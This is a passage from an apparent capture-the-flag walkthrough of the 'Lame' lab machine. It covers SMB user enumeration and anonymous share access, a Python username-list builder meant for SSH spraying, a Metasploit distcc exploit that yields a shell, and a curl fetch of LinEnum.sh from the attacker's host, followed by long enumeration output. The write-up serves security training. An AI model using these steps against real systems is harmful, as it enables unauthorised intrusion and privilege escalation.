S-1-5-21-2446995257-2525374255-2673161615-550 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1000 LAME\root (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1001 LAME\root (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1002 LAME\daemon (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1003 LAME\daemon (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1004 LAME\bin (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1005 LAME\bin (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1006 LAME\sys (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1007 LAME\sys (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1008 LAME\sync (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1009 LAME\adm (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1010 LAME\games (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1011 LAME\tty (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1012 LAME\man (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1013 LAME\disk (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1014 LAME\lp (Local User)
S-1-5-21-2446995257-2525374255-2673161615-1015 LAME\lp (Domain Group)
S-1-5-21-2446995257-2525374255-2673161615-1016 LAME\mail (Local User)
S-1-5-21-2446995257-2525374255-2673161615-1017 LAME\mail (Domain Group)
S-1-5-21-2446995257-2525374255-2673161615-1018 LAME\news (Local User)
S-1-5-21-2446995257-2525374255-2673161615-1019 LAME\news (Domain Group)
S-1-5-21-2446995257-2525374255-2673161615-1020 LAME\uucp (Local User)
S-1-5-21-2446995257-2525374255-2673161615-1021 LAME\uucp (Domain Group)
S-1-5-21-2446995257-2525374255-2673161615-1022 *unknown*\*unknown* (8)
S-1-5-21-2446995257-2525374255-2673161615-1023 *unknown*\*unknown* (8)
S-1-5-21-2446995257-2525374255-2673161615-1024 *unknown*\*unknown* (8)
S-1-5-21-2446995257-2525374255-2673161615-1025 LAME\man (Domain Group)
S-1-5-21-2446995257-2525374255-2673161615-1026 LAME\proxy (Local User)
S-1-5-21-2446995257-2525374255-2673161615-1027 LAME\proxy (Domain Group)
S-1-5-21-2446995257-2525374255-2673161615-1028 *unknown*\*unknown* (8)
S-1-5-21-2446995257-2525374255-2673161615-1029 *unknown*\*unknown* (8)
S-1-5-21-2446995257-2525374255-2673161615-1030 *unknown*\*unknown* (8)
S-1-5-21-2446995257-2525374255-2673161615-1031 LAME\kmem (Domain Group)
S-1-5-21-2446995257-2525374255-2673161615-1032 *unknown*\*unknown* (8)
S-1-5-21-2446995257-2525374255-2673161615-1033 *unknown*\*unknown* (8)
S-1-5-21-2446995257-2525374255-2673161615-1034 *unknown*\*unknown* (8)
S-1-5-21-2446995257-2525374255-2673161615-1035 *unknown*\*unknown* (8)
S-1-5-21-2446995257-2525374255-2673161615-1036 *unknown*\*unknown* (8)
S-1-5-21-2446995257-2525374255-2673161615-1037 *unknown*\*unknown* (8)
S-1-5-21-2446995257-2525374255-2673161615-1038 *unknown*\*unknown* (8)
S-1-5-21-2446995257-2525374255-2673161615-1039 *unknown*\*unknown* (8)
S-1-5-21-2446995257-2525374255-2673161615-1040 *unknown*\*unknown* (8)
S-1-5-21-2446995257-2525374255-2673161615-1041 LAME\dialout (Domain Group)
S-1-5-21-2446995257-2525374255-2673161615-1042 *unknown*\*unknown* (8)
S-1-5-21-2446995257-2525374255-2673161615-1043 LAME\fax (Domain Group)
S-1-5-21-2446995257-2525374255-2673161615-1044 *unknown*\*unknown* (8)
S-1-5-21-2446995257-2525374255-2673161615-1045 LAME\voice (Domain Group)
S-1-5-21-2446995257-2525374255-2673161615-1046 *unknown*\*unknown* (8)
S-1-5-21-2446995257-2525374255-2673161615-1047 *unknown*\*unknown* (8)
S-1-5-21-2446995257-2525374255-2673161615-1048 *unknown*\*unknown* (8)
S-1-5-21-2446995257-2525374255-2673161615-1049 LAME\cdrom (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 991.
S-1-5-21-2446995257-2525374255-2673161615-1050 *unknown*\*unknown* (8)

===========================================
| Getting printer info for 10.10.10.3 |
===========================================
No printers returned.

enum4linux complete on Tue Dec 5 16:35:23 2017

This gives us considerably more information about the target, including the local user and group accounts that exist on it (enum4linux recovers them by cycling through RIDs under the host's SID and asking the server to resolve each one). Those usernames could be useful if we end up needing to brute force SSH. Next, let's try to connect to the tmp and opt shares anonymously (just press Enter at the password prompt) to see whether they expose anything:


root@kali:~/Pentest/10.3-lame/01-recon/02-smb# smbclient //10.10.10.3/tmp
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Dec 5 19:30:10 2017
.. DR 0 Sun May 20 15:36:12 2012
.ICE-unix DH 0 Tue Dec 5 16:21:33 2017
5117.jsvc_up R 0 Tue Dec 5 16:21:51 2017
.X11-unix DH 0 Tue Dec 5 16:21:38 2017
.X0-lock HR 11 Tue Dec 5 16:21:38 2017

7282168 blocks of size 1024. 5678404 blocks available
smb: \> quit
root@kali:~/Pentest/10.3-lame/01-recon/02-smb# smbclient //10.10.10.3/opt
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password:
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED

So tmp is browsable anonymously and, judging by the .X11-unix and .ICE-unix socket directories and the .X0-lock file, appears to be backed by the host's actual /tmp, while opt rejects the anonymous tree connect with NT_STATUS_ACCESS_DENIED. Nothing in the tmp listing stands out as immediately useful, though an anonymously accessible share that maps onto the system's /tmp is worth remembering. We can always come back to this. Let's keep looking.
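One practical thing to do with the RID listing above is to turn it into a username list and, as a bonus, recover the Unix uid or gid behind each RID: a Samba server that is not using winbind/idmap maps them algorithmically (user RID = 2 * uid + 1000, group RID = 2 * gid + 1001), which is why lp appears as RID 1014 (uid 7) and the lp group as RID 1015 (gid 7). The following Python is an added example written for this page; it is not enum4linux's code or the original post's. The `SAMPLE` input is a handful of lines copied from the output above, and the function and class names are my own.

```python
"""Parse enum4linux RID-cycling output and recover Unix ids from Samba RIDs.

Added example for this walkthrough, not part of enum4linux or the original post.
SAMPLE below is constructed from lines copied out of the enumeration output.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Samba's default (algorithmic, no winbind/idmap) RID mapping:
#   user RID  = RID_MULTIPLIER * uid + BASE_RID
#   group RID = RID_MULTIPLIER * gid + BASE_RID + 1
BASE_RID = 1000
RID_MULTIPLIER = 2

# Matches e.g. "S-1-5-21-...-1014 LAME\lp (Local User)"; the Perl warnings
# that enum4linux interleaves with the listing simply fail to match.
SID_LINE = re.compile(
    r"^(?P<sid>S-1-5-21-\d+-\d+-\d+)-(?P<rid>\d+)\s+"
    r"(?P<domain>[^\\\s]+)\\(?P<name>\S+)\s+\((?P<kind>[^)]+)\)\s*$"
)

# Constructed sample: a few lines copied from the enum4linux output above.
SAMPLE = """\
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-1014 LAME\\lp (Local User)
S-1-5-21-2446995257-2525374255-2673161615-1015 LAME\\lp (Domain Group)
S-1-5-21-2446995257-2525374255-2673161615-1016 LAME\\mail (Local User)
S-1-5-21-2446995257-2525374255-2673161615-1022 *unknown*\\*unknown* (8)
S-1-5-21-2446995257-2525374255-2673161615-1026 LAME\\proxy (Local User)
S-1-5-21-2446995257-2525374255-2673161615-1031 LAME\\kmem (Domain Group)
"""


@dataclass
class Principal:
    rid: int
    name: str
    kind: str                # "Local User", "Domain Group", ...
    unix_id: Optional[int]   # recovered uid/gid, None if not algorithmic


def rid_to_unix_id(rid: int, kind: str) -> Optional[int]:
    """Invert Samba's algorithmic mapping; None if the RID cannot be one."""
    if kind == "Local User":
        base = BASE_RID
    elif kind == "Domain Group":
        base = BASE_RID + 1
    else:
        return None
    if rid < base or (rid - base) % RID_MULTIPLIER:
        return None
    return (rid - base) // RID_MULTIPLIER


def parse_enum4linux(text: str) -> List[Principal]:
    """Extract resolved principals, skipping warnings and *unknown* RIDs."""
    found = []
    for line in text.splitlines():
        m = SID_LINE.match(line.strip())
        if not m or m["name"] == "*unknown*":
            continue
        rid = int(m["rid"])
        found.append(Principal(rid, m["name"], m["kind"],
                               rid_to_unix_id(rid, m["kind"])))
    return found


def user_wordlist(principals: List[Principal]) -> List[str]:
    """Sorted unique usernames (Local User entries only), e.g. for an SSH spray."""
    return sorted({p.name for p in principals if p.kind == "Local User"})


if __name__ == "__main__":
    principals = parse_enum4linux(SAMPLE)
    for p in principals:
        print(f"RID {p.rid}  {p.kind:12}  {p.name:8}  unix id {p.unix_id}")
    print("wordlist:", " ".join(user_wordlist(principals)))
```

Feeding the whole enum4linux output through `parse_enum4linux` gives the complete account list in one pass; the recovered ids can be cross-checked later against `id` or /etc/passwd once you have a shell (lp is uid 7 and kmem is gid 15 on this box), which is a cheap way to confirm that the SMB server really is exposing the local Unix account database rather than a separate passdb.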

distccd (TCP 3632)

This is a new service for me and not one I have run into before. First things first: what is it? A quick search turns up https://linux.die.net/man/1/distccd, which explains that distccd is the server side of distcc, a distributed C/C++ compiler. A service whose whole job is to accept source from the network and run a compiler on it is a promising target for code execution. Let's search for exploits:

The first result is another Metasploit module. Since our first exploit attempt failed, I'm not expecting much, but it's worth a try:

Exploit: https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec (exploit/unix/misc/distcc_exec)

Yes! We have a shell. It is a bare command channel with no tty, though, so let's upgrade it before going further:


python -c 'import pty; pty.spawn("/bin/sh")'
sh-3.2$

Much better. The shell still lacks line editing and job control (backgrounding it, running stty raw -echo locally, foregrounding it again and exporting TERM would give a fully interactive session), but this is enough for enumeration.

Privilege Escalation

Enumeration

Now we need to escalate privileges. First things first: we start enumeration over, this time from the inside, with the view our low-privileged shell gives us. We'll begin with LinEnum.sh by rebootuser (available at https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh), served from a web server on our attacking machine (10.10.14.5) and fetched with curl into /tmp:


sh-3.2$ cd /tmp
cd /tmp
sh-3.2$ curl -O http://10.10.14.5/enum/LinEnum.sh
curl -O http://10.10.14.5/enum/LinEnum.sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 43283 100 43283 0 0 161k 0 --:--:-- --:--:-- --:--:-- 775k
sh-3.2$ chmod +x LinEnum.sh
chmod +x LinEnum.sh

With the script downloaded and marked executable, we run it with -t to enable the thorough checks:


sh-3.2$ ./LinEnum.sh -t
./LinEnum.sh -t
#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
#

Debug Info
thorough tests = enabled

Scan started at:
Tue Dec 5 19:46:58 EST 2017

### SYSTEM ##############################################
Kernel information:
Linux lame 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Kernel information (continued):
Linux version 2.6.24-16-server (buildd@palmer) (gcc version 4.2.3 (Ubuntu 4.2.3-2ubuntu7)) #1 SMP Thu Apr 10 13:58:00 UTC 2008

Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04"

Hostname:
lame

### USER/GROUP ##########################################
Current user/group info:
uid=1(daemon) gid=1(daemon) groups=1(daemon)

Users that have previously logged onto the system:
Username Port From Latest
root pts/0 :0.0 Tue Dec 5 16:21:39 -0500 2017
makis pts/1 192.168.150.100 Tue Mar 14 18:32:04 -0400 2017

Who else is logged on:
19:46:59 up 3:25, 1 user, load average: 0.99, 0.97, 0.91
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 :0.0 16:21 3:25 0.00s 0.00s -bash

Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)
uid=101(dhcp) gid=102(dhcp) groups=102(dhcp)
uid=102(syslog) gid=103(syslog) groups=103(syslog)
uid=103(klog) gid=104(klog) groups=104(klog)
uid=104(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=105(bind) gid=113(bind) groups=113(bind)
uid=106(postfix) gid=115(postfix) groups=115(postfix)
uid=107(ftp) gid=65534(nogroup) groups=65534(nogroup)
uid=108(postgres) gid=117(postgres) groups=117(postgres),114(ssl-cert)
uid=109(mysql) gid=118(mysql) groups=118(mysql)
uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup)
uid=111(distccd) gid=65534(nogroup) groups=65534(nogroup)
uid=1002(service) gid=1002(service) groups=1002(service)
uid=112(telnetd) gid=120(telnetd) groups=120(telnetd),43(utmp)
uid=113(proftpd) gid=65534(nogroup) groups=65534(nogroup)
uid=114(statd) gid=65534(nogroup) groups=65534(nogroup)
uid=115(snmp) gid=65534(nogroup) groups=65534(nogroup)
uid=1003(makis) gid=1003(makis) groups=1003(makis),4(adm),112(admin)

Sample entires from /etc/passwd (searching for uid values 0, 500, 501, 502, 1000, 1001, 1002, 2000, 2001, 2002):
root:x:0:0:root:/root:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash

Super user account(s):
root

***We can read root's home directory!
total 80K
drwxr-xr-x 13 root root 4.0K Dec 5 16:21 .
drwxr-xr-x 21 root root 4.0K May 20 2012 ..
-rw------- 1 root root 373 Dec 5 16:21 .Xauthority
lrwxrwxrwx 1 root root 9 May 14 2012 .bash_history -> /dev/null
-rw-r--r-- 1 root root 2.2K Oct 20 2007 .bashrc
drwx------ 3 root root 4.0K May 20 2012 .config
drwx------ 2 root root 4.0K May 20 2012 .filezilla
drwxr-xr-x 5 root root 4.0K Dec 5 16:21 .fluxbox
drwx------ 2 root root 4.0K May 20 2012 .gconf
drwx------ 2 root root 4.0K May 20 2012 .gconfd
drwxr-xr-x 2 root root 4.0K May 20 2012 .gstreamer-0.10
drwx------ 4 root root 4.0K May 20 2012 .mozilla
-rw-r--r-- 1 root root 141 Oct 20 2007 .profile
drwx------ 5 root root 4.0K May 20 2012 .purple
-rwx------ 1 root root 4 May 20 2012 .rhosts
drwxr-xr-x 2 root root 4.0K May 20 2012 .ssh
drwx------ 2 root root 4.0K Dec 5 16:21 .vnc
drwxr-xr-x 2 root root 4.0K May 20 2012 Desktop
-rwx------ 1 root root 401 May 20 2012 reset_logs.sh
-rw------- 1 root root 33 Mar 14 2017 root.txt
-rw-r--r-- 1 root root 118 Dec 5 16:21 vnc.log

Are permissions on /home directories lax:
total 24K
drwxr-xr-x 6 root root 4.0K Mar 14 2017 .
drwxr-xr-x 21 root root 4.0K May 20 2012 ..
drwxr-xr-x 2 root nogroup 4.0K Mar 17 2010 ftp
drwxr-xr-x 2 makis makis 4.0K Mar 14 2017 makis
drwxr-xr-x 2 service service 4.0K Apr 16 2010 service
drwxr-xr-x 3 1001 1001 4.0K May 7 2010 user

World-readable files within /home:
-rw-r--r-- 1 service service 586 Apr 16 2010 /home/service/.profile
-rw-r--r-- 1 service service 2928 Apr 16 2010 /home/service/.bashrc
-rw-r--r-- 1 service service 220 Apr 16 2010 /home/service/.bash_logout
-rw-r--r-- 1 makis makis 33 Mar 14 2017 /home/makis/user.txt
-rw-r--r-- 1 makis makis 586 Mar 14 2017 /home/makis/.profile
-rw-r--r-- 1 makis makis 0 Mar 14 2017 /home/makis/.sudo_as_admin_successful
-rw-r--r-- 1 makis makis 2928 Mar 14 2017 /home/makis/.bashrc
-rw-r--r-- 1 makis makis 220 Mar 14 2017 /home/makis/.bash_logout
-rw-r--r-- 1 1001 1001 586 Mar 31 2010 /home/user/.profile
-rw-r--r-- 1 1001 1001 2928 Mar 31 2010 /home/user/.bashrc
-rw-r--r-- 1 1001 1001 220 Mar 31 2010 /home/user/.bash_logout

Home directory contents:
total 27M
drwxr-xr-x 2 root root 12K Dec 5 16:59 .
drwxr-xr-x 12 root root 4.0K Apr 28 2010 ..
-rw------- 1 root daemon 679 Dec 5 16:59 .bash_history
-rwxr-xr-x 1 root root 5.2K Mar 5 2007 MAKEFLOPPIES
-rwxr-xr-x 1 root root 1.1K Mar 9 2010 a2dismod
-rwxr-xr-x 1 root root 839 Mar 9 2010 a2dissite
-rwxr-xr-x 1 root root 1.7K Mar 9 2010 a2enmod
-rwxr-xr-x 1 root root 923 Mar 9 2010 a2ensite
lrwxrwxrwx 1 root root 5 Apr 28 2010 aa-audit -> audit
lrwxrwxrwx 1 root root 7 Apr 28 2010 aa-autodep -> autodep
lrwxrwxrwx 1 root root 8 Apr 28 2010 aa-complain -> complain
lrwxrwxrwx 1 root root 7 Apr 28 2010 aa-enforce -> enforce
lrwxrwxrwx 1 root root 7 Apr 28 2010 aa-genprof -> genprof
lrwxrwxrwx 1 root root 7 Apr 28 2010 aa-logprof -> logprof
lrwxrwxrwx 1 root root 15 Apr 28 2010 aa-status -> apparmor_status
lrwxrwxrwx 1 root root 10 Apr 28 2010 aa-unconfined -> unconfined
-rwxr-xr-x 1 root root 43K Mar 9 2010 ab
-rwxr-xr-x 1 root root 63K Mar 12 2008 accessdb
-rwxr-xr-x 1 root root 704 Mar 31 2008 add-shell
lrwxrwxrwx 1 root root 7 Apr 28 2010 addgroup -> adduser
-rwxr-xr-x 1 root root 33K Oct 23 2007 adduser
-rwxr-xr-x 1 root root 341K Mar 9 2010 apache2
-rwxr-xr-x 1 root root 4.3K Mar 9 2010 apache2ctl
-rwxr-xr-x 1 root root 6.4K Apr 7 2008 apparmor_status
-rwxr-xr-x 1 root root 43K Dec 13 2007 arp
-rwxr-xr-x 1 root root 30K Apr 12 2008 arpd
-rwxr-xr-x 1 root root 16K Feb 20 2007 atd
-rwxr-xr-x 1 root root 3.5K Apr 7 2008 audit
-rwxr-xr-x 1 root root 3.8K Apr 7 2008 autodep
-rwxr-xr-x 1 root root 8.8K Jul 31 2007 biosdecode
-rwxr-xr-x 1 root root 19K Oct 4 2007 chat
-rwxr-xr-x 1 root root 950 Mar 9 2010 check_forensic
-rwxr-xr-x 1 root root 3.3K Mar 9 2010 checkgid
-rwxr-xr-x 1 root root 5.4K Nov 22 2007 checkrhosts
-rwxr-xr-x 1 root root 25K Apr 2 2008 chgpasswd
-rwxr-xr-x 1 root root 23K Apr 2 2008 chpasswd
-rwxr-xr-x 1 root root 23K Apr 4 2008 chroot
-rwxr-xr-x 1 root root 4.7K Feb 12 2008 cleanup-info
-rwxr-xr-x 1 root root 3.6K Apr 7 2008 complain
lrwxrwxrwx 1 root root 4 Apr 28 2010 cpgr -> cppw
-rwxr-xr-x 1 root root 27K Apr 2 2008 cppw
-rwxr-xr-x 1 root root 31K Apr 8 2008 cron
-rwxr-xr-x 1 root root 9.0K Apr 14 2008 cytune
-rwxr-xr-x 1 root root 1.4K Jun 17 2006 defoma-reconfigure
lrwxrwxrwx 1 root root 7 Apr 28 2010 delgroup -> deluser
-rwxr-xr-x 1 root root 15K Oct 23 2007 deluser
-rwxr-xr-x 1 root root 48K Jul 31 2007 dmidecode
-rwxr-xr-x 1 root root 21K Apr 9 2008 dnssec-keygen
-rwxr-xr-x 1 root root 55K Apr 9 2008 dnssec-signzone
-rwxr-xr-x 1 root root 11K Feb 12 2008 dpkg-divert
-rwxr-xr-x 1 root root 3.4K Mar 11 2008 dpkg-preconfigure
-rwxr-xr-x 1 root root 3.4K Mar 11 2008 dpkg-reconfigure
-rwxr-xr-x 1 root root 5.9K Feb 12 2008 dpkg-statoverride
-rwxr-xr-x 1 root root 254 May 20 2012 druby_timeserver.rb
-rwxr-xr-x 1 root root 3.8K Apr 7 2008 enforce
-rwxr-xr-x 1 root root 108K Oct 23 2007 ethtool
-rwxr-xr-x 1 root root 40K Dec 2 2008 exportfs
-rwxr-xr-x 1 root root 2.1K Mar 5 2007 fdutilsconfig
-rwxr-xr-x 1 root root 6.4K Mar 27 2008 filefrag
-rwxr-xr-x 1 root root 27K Feb 20 2008 ftpasswd
-rwxr-xr-x 1 root root 31K Feb 20 2008 ftpquota
-rwxr-xr-x 1 root root 5.8K Feb 20 2008 ftpshut
-rwxr-xr-x 1 root root 12K Feb 20 2008 ftpstats
-rwxr-xr-x 1 root root 2.6K Apr 22 2008 gconf-schemas
-rwxr-xr-x 1 root root 5.1K Apr 7 2008 genprof
-rwxr-xr-x 1 root root 29K Apr 2 2008 groupadd
-rwxr-xr-x 1 root root 21K Apr 2 2008 groupdel
-rwxr-xr-x 1 root root 25K Apr 2 2008 groupmod
-rwxr-xr-x 1 root root 28K Apr 2 2008 grpck
-rwxr-xr-x 1 root root 21K Apr 2 2008 grpconv
-rwxr-xr-x 1 root root 21K Apr 2 2008 grpunconv
-rwxr-xr-x 1 root root 140K Dec 10 2009 grub
-rwxr-xr-x 1 root root 153 Dec 10 2009 grub-floppy
-rwxr-xr-x 1 root root 17K Dec 10 2009 grub-install
-rwxr-xr-x 1 root root 2.3K Dec 10 2009 grub-md5-crypt
-rwxr-xr-x 1 root root 1.5K Dec 10 2009 grub-reboot
-rwxr-xr-x 1 root root 3.2K Dec 10 2009 grub-set-default
-rwxr-xr-x 1 root root 2.5K Dec 10 2009 grub-terminfo
-rwxr-xr-x 1 root root 7.6K Dec 2 2008 gss_clnt_send_err
-rwxr-xr-x 1 root root 217 Dec 2 2008 gss_destroy_creds
-rwxr-xr-x 1 root root 17K Mar 9 2010 htcacheclean
-rwxr-xr-x 1 root root 7.5K Mar 9 2010 httxt2dbm
-rwxr-xr-x 1 root root 26K Aug 17 2009 iconvconfig
lrwxrwxrwx 1 root root 7 Apr 28 2010 in.proftpd -> proftpd
-rwxr-xr-x 1 root root 8.1K Nov 22 2007 in.rexecd
-rwxr-xr-x 1 root root 16K Nov 22 2007 in.rlogind
-rwxr-xr-x 1 root root 15K Nov 22 2007 in.rshd
-rwxr-xr-x 1 root root 36K Dec 17 2006 in.telnetd
-rwxr-xr-x 1 root root 12K Dec 17 2006 in.tftpd
-rwxr-xr-x 1 root root 12K Aug 16 2007 inputattach
-rwxr-xr-x 1 root root 16K Feb 12 2008 install-info
lrwxrwxrwx 1 root root 19 May 20 2012 install-menu -> ../bin/install-menu
-rwxr-xr-x 1 root root 4.5K Oct 26 2004 install-sgmlcatalog
-rwxr-xr-x 1 root root 11K Apr 19 2008 invoke-rc.d
-rwxr-xr-x 1 root root 19K Dec 3 2007 itox
-rwxr-xr-x 1 root root 2.4K Jul 31 2007 laptop-detect
-rwxr-xr-x 1 root root 6.8K Mar 11 2008 locale-gen
-rwxr-xr-x 1 root root 2.0K Apr 7 2008 logprof
-rwxr-xr-x 1 root root 6.7K Mar 9 2010 logresolve
-rwxr-xr-x 1 root root 38K Jun 19 2006 logrotate
-rwxr-xr-x 1 root root 66K Feb 24 2008 lsusb
-rwxr-xr-x 1 root root 3.8K Feb 20 2008 make-ssl-cert
-rwxr-xr-x 1 root root 26K Jun 19 2006 mii-diag
-rwxr-xr-x 1 root root 11K Mar 31 2008 mkboot
-rwxr-xr-x 1 root root 7.0K Mar 14 2008 mkinitramfs
-rwxr-xr-x 1 root root 1.9K Dec 21 2006 mkinitramfs-kpkg
-rwxr-xr-x 1 root root 4.4K Mar 27 2008 mklost+found
-rwxr-xr-x 1 root root 206 Apr 28 2010 mksmbpasswd
-rwxr-xr-x 1 root root 7.1M Mar 28 2008 mysqld
-rwxr-xr-x 1 root root 1.9M Mar 28 2008 mysqlmanager
-rwxr-xr-x 1 root root 343K Apr 9 2008 named
-rwxr-xr-x 1 root root 21K Apr 9 2008 named-checkconf
-rwxr-xr-x 1 root root 19K Apr 9 2008 named-checkzone
lrwxrwxrwx 1 root root 15 Apr 28 2010 named-compilezone -> named-checkzone
-rwxr-xr-x 1 root root 2.0M Mar 28 2008 ndb_cpcd
-rwxr-xr-x 1 root root 2.1M Mar 28 2008 ndb_mgmd
-rwxr-xr-x 1 root root 3.4M Mar 28 2008 ndbd
-rwxr-xr-x 1 root root 28K Apr 2 2008 newusers
-rwxr-xr-x 1 root root 15K Dec 2 2008 nfsstat
-rwxr-xr-x 1 root root 948K Apr 28 2010 nmbd
-rwxr-xr-x 1 root root 3.2K Apr 2 2008 nologin
-rwxr-xr-x 1 root root 45K Mar 7 2008 ntpdate
-rwxr-xr-x 1 root root 530 Mar 7 2008 ntpdate-debian
-rwxr-xr-x 1 root root 4.9K Jul 31 2007 ownership
-rwxr-xr-x 1 root root 2.9K Apr 9 2008 pam_getenv
-rwxr-xr-x 1 root root 3.4K May 20 2007 pg_maintenance
-rwxr-xr-x 1 root root 540 Jan 28 2008 popcon-largest-unused
-rwxr-xr-x 1 root root 4.1K Jan 28 2008 popularity-contest
-rwxr-xr-x 1 root root 12K Apr 18 2008 postalias
-rwxr-xr-x 1 root root 9.8K Apr 18 2008 postcat
-rwxr-xr-x 1 root root 63K Apr 18 2008 postconf
-r-xr-sr-x 1 root postdrop 9.9K Apr 18 2008 postdrop
-rwxr-xr-x 1 root root 7.1K Apr 18 2008 postfix
-rwxr-xr-x 1 root root 5.7K Apr 18 2008 postkick
-rwxr-xr-x 1 root root 6.0K Apr 18 2008 postlock
-rwxr-xr-x 1 root root 5.9K Apr 18 2008 postlog
-rwxr-xr-x 1 root root 12K Apr 18 2008 postmap
-r-xr-sr-x 1 root postdrop 11K Apr 18 2008 postqueue
-rwxr-xr-x 1 root root 17K Apr 18 2008 postsuper
-rwxr-xr-x 1 root root 60K Jun 22 2007 pppconfig
-rwsr-xr-- 1 root dip 263K Oct 4 2007 pppd
-rwxr-xr-x 1 root root 14K Oct 4 2007 pppdump
-rwxr-xr-x 1 root root 18K Oct 4 2007 pppoe-discovery
-rwxr-xr-x 1 root root 19K Dec 3 2007 pppoeconf
-rwxr-xr-x 1 root root 9.8K Oct 4 2007 pppstats
-rwxr-xr-x 1 root root 544K Feb 20 2008 proftpd
-rwxr-xr-x 1 root root 26K Apr 2 2008 pwck
-rwxr-xr-x 1 root root 22K Apr 2 2008 pwconv
-rwxr-xr-x 1 root root 20K Apr 2 2008 pwunconv
-rwxr-xr-x 1 root root 7.3K Apr 18 2008 qmqp-sink
-rwxr-xr-x 1 root root 12K Apr 18 2008 qmqp-source
-rwxr-xr-x 1 root root 13K Apr 18 2008 qshape
lrwxrwxrwx 1 root root 4 Apr 28 2010 ramsize -> rdev
-rwxr-xr-x 1 root root 7.7K Apr 14 2008 rdev
-rwxr-xr-x 1 root root 11K Apr 14 2008 readprofile
-rwxr-xr-x 1 root root 502 Jun 10 2008 rebuild-security-providers
-rwxr-xr-x 1 root root 749 Mar 31 2008 remove-shell
-rwxr-xr-x 1 root root 9.1K Apr 18 2008 rmail
lrwxrwxrwx 1 root root 21 Apr 28 2010 rmt -> /etc/alternatives/rmt
-rwxr-xr-x 1 root root 24K Apr 4 2008 rmt-tar
-rwxr-xr-x 1 root root 24K Apr 9 2008 rndc
-rwxr-xr-x 1 root root 12K Apr 9 2008 rndc-confgen
lrwxrwxrwx 1 root root 4 Apr 28 2010 rootflags -> rdev
-rwxr-xr-x 1 root root 8.4K Mar 9 2010 rotatelogs
-rwxr-xr-x 1 root root 52K Dec 2 2008 rpc.gssd
-rwxr-xr-x 1 root root 35K Dec 2 2008 rpc.idmapd
-rwxr-xr-x 1 root root 72K Dec 2 2008 rpc.mountd
-rwxr-xr-x 1 root root 9.9K Dec 2 2008 rpc.nfsd
-rwxr-xr-x 1 root root 21K Dec 2 2008 rpc.svcgssd
-rwxr-xr-x 1 root root 8.6K Dec 2 2008 rpcdebug
-rwxr-xr-x 1 root root 11K Apr 14 2008 rtcwake
